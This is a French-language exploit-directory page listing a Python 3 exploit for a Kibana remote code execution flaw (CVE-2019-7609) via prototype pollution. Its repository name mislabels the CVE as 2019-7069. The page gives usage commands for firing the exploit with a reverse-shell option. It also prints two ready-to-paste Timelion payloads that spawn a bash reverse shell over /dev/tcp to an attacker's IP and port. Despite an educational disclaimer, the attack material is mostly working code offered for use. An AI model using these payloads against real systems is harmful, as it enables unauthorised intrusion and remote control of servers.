Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-7069-POC — Python 3 exploit pour Kibana < 6.6.1 RCE (CVE-2019-7609) via pollution de prototype, avec détection automatique de version et reverse shell optionnel. | Kitploit
Outils/GitHubGitHub/caelumisme/cve-2019-7069-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubcaelumisme/cve-2019-7069-poc

CVE-2019-7069-POC

Python 3 exploit pour Kibana < 6.6.1 RCE (CVE-2019-7609) via pollution de prototype, avec détection automatique de version et reverse shell optionnel.

Voir le dépôt
1il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Kibana < 6.6.1 Exploit d'exécution de code à distance (CVE-2019-7609)

Exploit Banner

🚨 Exploit RCE éducatif 🚨

Auteur : LandGrey (Refactorisation Python3 par [Votre Nom])
Référence : Exploit-DB 46651
CVE : CVE-2019-7609


⚠️ Avertissement :
Ce script est destiné uniquement à des fins éducatives et de tests de pénétration autorisés. Ne l'utilisez pas sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas l'autorisation explicite de tester. L'auteur et les contributeurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par cet outil.


🎯 Qu'est-ce que c'est ?

Il s'agit d'un script d'exploit Python 3 pour la vulnérabilité d'exécution de code à distance dans Kibana versions < 6.6.1. Il exploite une faille de pollution de prototype pour exécuter des commandes arbitraires, y compris le déclenchement d'un reverse shell, sur une instance Kibana vulnérable.

🕹️ Fonctionnalités

  • Détecte automatiquement la version de Kibana
  • Vérifie l'état de la vulnérabilité
  • Déclenche optionnellement un reverse shell vers votre écouteur
  • Sortie terminale propre et interactive
  • Compatible avec Python 3

📚 Références

  • Exploit-DB Entry 46651
  • Site officiel de Kibana
  • CVE-2019-7609

🚀 Utilisation

root@kitploit:~
python3 kibana_exploit.py -u http://target-kibana:5601

Pour déclencher un reverse shell :

root@kitploit:~
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT

Exemple

root@kitploit:~
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444

🛠️ Prérequis

  • Python 3.x
  • Bibliothèque requests
  • Bibliothèque packaging

Installez les dépendances avec :

root@kitploit:~
pip install requests packaging

💡 Exploitation manuelle via Timelion

Vous pouvez également exploiter cette vulnérabilité manuellement en utilisant le visualiseur Timelion de Kibana :

  1. Ouvrez Kibana
  2. Collez l'un des payloads suivants dans le visualiseur Timelion
  3. Cliquez sur Run
  4. Dans le panneau de gauche, cliquez sur Canvas
  5. Votre reverse shell devrait apparaître ! :)

Payload par securityMB :

root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Payload par chybeta :

root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Remplacez 192.168.1.100 et 4444 par votre propre IP et port d'écoute.


🧩 Comment ça fonctionne

  • Détecte la version de Kibana via une requête HTTP
  • Vérifie si la cible est vulnérable à CVE-2019-7609
  • Exploite la pollution de prototype pour exécuter des commandes arbitraires
  • Déclenche optionnellement un reverse shell vers l'hôte et le port spécifiés

🎨 Sortie

Le script fournit une sortie claire, étape par étape, pour la détection, la vérification et l'exploitation, ce qui le rend facile à suivre et amusant à utiliser !


👾 Pour le plaisir et l'apprentissage

Ce script est un excellent moyen d'apprendre la pollution de prototype, l'exécution de code à distance et les techniques de tests de pénétration. Utilisez-le de manière responsable et toujours avec autorisation !


📝 Licence

Ce projet est uniquement à des fins éducatives. Aucune garantie. Hackez éthiquement, restez curieux et amusez-vous !

Télécharger l’outil